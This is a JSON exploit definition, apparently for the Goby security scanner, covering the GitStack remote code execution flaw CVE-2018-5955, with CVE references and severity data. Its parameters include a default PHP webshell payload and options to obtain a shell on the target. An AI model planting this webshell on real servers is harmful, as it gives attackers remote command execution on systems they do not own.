Goby/json/GitStack-RCE-(CVE-2018-5955...

60 lines
1.5 KiB
JSON

{
"Name": "GitStack RCE (CVE-2018-5955)",
"Description": "An issue was discovered in GitStack through 2.3.12. User controlled input is not sufficiently filtered, allowing an unauthenticated attacker to add a user to the server via the username and password fields to the rest/user/ URI.",
"Product": "GitStack",
"Homepage": "https://gitstack.com/",
"DisclosureDate": "2021-06-16",
"Author": "mengzd@foxmail.com",
"FofaQuery": "",
"GobyQuery": "product=\"GitStack-Code\"",
"Level": "3",
"Impact": "",
"Recommendation": "",
"References": [
"https://gobies.org/"
],
"RealReferences": [
"https://blogs.securiteam.com/index.php/archives/3557",
"https://www.exploit-db.com/exploits/44356/",
"https://nvd.nist.gov/vuln/detail/CVE-2018-5955",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5955"
],
"HasExp": true,
"ExpParams": [
{
"name": "AttackType",
"type": "select",
"value": "goby_shell_windows,get_webshell"
},
{
"name": "webshell",
"type": "input",
"value": "<?php eval($_POST['ant']); ?>",
"show": "AttackType=get_webshell"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND"
],
"ExploitSteps": null,
"Tags": [
"RCE"
],
"CVEIDs": [
"CVE-2018-5955"
],
"CVSSScore": "9.8",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
},
"Disable": false,
"Recommendation": ""
}